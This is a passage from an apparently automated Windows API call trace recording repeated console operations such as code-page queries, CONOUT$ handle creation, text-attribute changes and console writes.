lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.230] GetLastError () returned 0xcb [0160.230] GetConsoleOutputCP () returned 0x1b5 [0160.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.230] GetLastError () returned 0xcb [0160.230] GetConsoleOutputCP () returned 0x1b5 [0160.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.230] GetLastError () returned 0xcb [0160.230] GetConsoleOutputCP () returned 0x1b5 [0160.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.230] GetLastError () returned 0xcb [0160.230] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.231] GetLastError () returned 0xcb [0160.231] GetConsoleOutputCP () returned 0x1b5 [0160.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.232] GetLastError () returned 0xcb [0160.232] GetConsoleOutputCP () returned 0x1b5 [0160.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.232] GetLastError () returned 0xcb [0160.232] GetConsoleOutputCP () returned 0x1b5 [0160.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.273] GetLastError () returned 0xcb [0160.273] GetConsoleOutputCP () returned 0x1b5 [0160.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.274] GetLastError () returned 0xcb [0160.274] GetConsoleOutputCP () returned 0x1b5 [0160.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.274] GetLastError () returned 0xcb [0160.274] GetConsoleOutputCP () returned 0x1b5 [0160.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.274] GetLastError () returned 0xcb [0160.274] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.275] GetLastError () returned 0xcb [0160.275] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.276] GetLastError () returned 0xcb [0160.276] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.277] GetLastError () returned 0xcb [0160.277] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.277] GetLastError () returned 0xcb [0160.277] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.277] GetLastError () returned 0xcb [0160.277] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.277] GetLastError () returned 0xcb [0160.277] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.277] GetLastError () returned 0xcb [0160.277] GetConsoleOutputCP () returned 0x1b5 [0160.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.278] GetLastError () returned 0xcb [0160.278] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.279] GetConsoleOutputCP () returned 0x1b5 [0160.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.279] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.280] GetLastError () returned 0xcb [0160.280] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.281] GetLastError () returned 0xcb [0160.281] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.281] GetLastError () returned 0xcb [0160.281] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.281] GetLastError () returned 0xcb [0160.281] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.281] GetLastError () returned 0xcb [0160.281] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.281] GetLastError () returned 0xcb [0160.281] GetConsoleOutputCP () returned 0x1b5 [0160.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea80) returned 0 [0160.281] GetLastError () returned 0xcb [0160.287] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0160.287] GetLastError () returned 0xcb [0160.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.287] GetLastError () returned 0xcb [0160.287] GetConsoleOutputCP () returned 0x1b5 [0160.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.287] GetLastError () returned 0xcb [0160.288] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0160.288] GetLastError () returned 0xcb [0160.288] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x5dcead0 | out: lpMode=0x5dcead0) returned 1 [0160.288] GetLastError () returned 0xcb [0160.292] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0160.293] GetLastError () returned 0xcb [0160.293] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.293] GetLastError () returned 0xcb [0160.297] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0160.297] GetLastError () returned 0xcb [0160.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.297] GetLastError () returned 0xcb [0160.301] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.301] GetLastError () returned 0xcb [0160.301] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.301] GetLastError () returned 0xcb [0160.303] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0160.304] GetLastError () returned 0xcb [0160.309] CloseHandle (hObject=0x23) returned 1 [0160.309] GetLastError () returned 0xcb [0160.313] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.351] GetLastError () returned 0xcb [0160.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.351] GetLastError () returned 0xcb [0160.351] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0160.351] GetLastError () returned 0xcb [0160.352] CloseHandle (hObject=0x23) returned 1 [0160.352] GetLastError () returned 0xcb [0160.352] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.352] GetLastError () returned 0xcb [0160.352] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x5dcea68 | out: lpMode=0x5dcea68) returned 1 [0160.353] GetLastError () returned 0xcb [0160.356] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.357] GetLastError () returned 0xcb [0160.357] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.357] GetLastError () returned 0xcb [0160.360] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2bd979c*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bd979c*, lpNumberOfCharsWritten=0x5dcea4c*=0x4f) returned 1 [0160.372] GetLastError () returned 0xcb [0160.372] CloseHandle (hObject=0x23) returned 1 [0160.373] GetLastError () returned 0xcb [0160.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.383] GetLastError () returned 0xcb [0160.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.383] GetLastError () returned 0xcb [0160.383] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0160.384] GetLastError () returned 0xcb [0160.384] CloseHandle (hObject=0x23) returned 1 [0160.384] GetLastError () returned 0xcb [0160.388] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.392] GetLastError () returned 0xcb [0160.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.392] GetLastError () returned 0xcb [0160.392] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0160.393] GetLastError () returned 0xcb [0160.393] CloseHandle (hObject=0x23) returned 1 [0160.393] GetLastError () returned 0xcb [0160.397] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.401] GetLastError () returned 0xcb [0160.401] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.401] GetLastError () returned 0xcb [0160.401] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.401] GetLastError () returned 0xcb [0160.402] CloseHandle (hObject=0x23) returned 1 [0160.402] GetLastError () returned 0xcb [0160.406] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0160.411] GetLastError () returned 0xcb [0160.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.411] GetLastError () returned 0xcb [0160.411] GetConsoleOutputCP () returned 0x1b5 [0160.412] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.412] GetLastError () returned 0xcb [0160.415] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0160.420] GetLastError () returned 0xcb [0160.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.421] GetLastError () returned 0xcb [0160.424] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0160.432] GetLastError () returned 0xcb [0160.432] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5dce9f8 | out: lpConsoleScreenBufferInfo=0x5dce9f8) returned 1 [0160.432] GetLastError () returned 0xcb [0160.436] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.436] GetLastError () returned 0xcb [0160.436] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.436] GetLastError () returned 0xcb [0160.436] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0160.436] GetLastError () returned 0xcb [0160.436] CloseHandle (hObject=0x2f) returned 1 [0160.437] GetLastError () returned 0xcb [0160.440] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.440] GetLastError () returned 0xcb [0160.440] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dcea00 | out: lpConsoleScreenBufferInfo=0x5dcea00) returned 1 [0160.441] GetLastError () returned 0xcb [0160.441] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0160.441] GetLastError () returned 0xcb [0160.441] CloseHandle (hObject=0x2f) returned 1 [0160.441] GetLastError () returned 0xcb [0160.445] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.445] GetLastError () returned 0xcb [0160.445] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5dcea4c | out: lpMode=0x5dcea4c) returned 1 [0160.445] GetLastError () returned 0xcb [0160.445] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2bd9ec0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5dcea4c, lpReserved=0x0 | out: lpBuffer=0x2bd9ec0*, lpNumberOfCharsWritten=0x5dcea4c*=0x4f) returned 1 [0160.445] GetLastError () returned 0xcb [0160.445] CloseHandle (hObject=0x2f) returned 1 [0160.446] GetLastError () returned 0xcb [0160.449] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.450] GetLastError () returned 0xcb [0160.450] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.450] GetLastError () returned 0xcb [0160.450] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0160.450] GetLastError () returned 0xcb [0160.450] CloseHandle (hObject=0x2f) returned 1 [0160.450] GetLastError () returned 0xcb [0160.454] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.454] GetLastError () returned 0xcb [0160.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dce9fc | out: lpConsoleScreenBufferInfo=0x5dce9fc) returned 1 [0160.455] GetLastError () returned 0xcb [0160.455] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0160.455] GetLastError () returned 0xcb [0160.455] CloseHandle (hObject=0x2f) returned 1 [0160.455] GetLastError () returned 0xcb [0160.459] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.459] GetLastError () returned 0xcb [0160.459] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5dcea8c | out: lpMode=0x5dcea8c) returned 1 [0160.459] GetLastError () returned 0xcb [0160.459] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2919938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5dcea8c, lpReserved=0x0 | out: lpBuffer=0x2919938*, lpNumberOfCharsWritten=0x5dcea8c*=0x1) returned 1 [0160.460] GetLastError () returned 0xcb [0160.460] CloseHandle (hObject=0x2f) returned 1 [0160.460] GetLastError () returned 0xcb [0160.463] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.463] GetLastError () returned 0xcb [0160.463] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dcea58 | out: lpConsoleScreenBufferInfo=0x5dcea58) returned 1 [0160.464] GetLastError () returned 0xcb [0160.464] GetConsoleOutputCP () returned 0x1b5 [0160.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dcea60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dcea60) returned 0 [0160.464] GetLastError () returned 0xcb [0160.467] CreateFileW 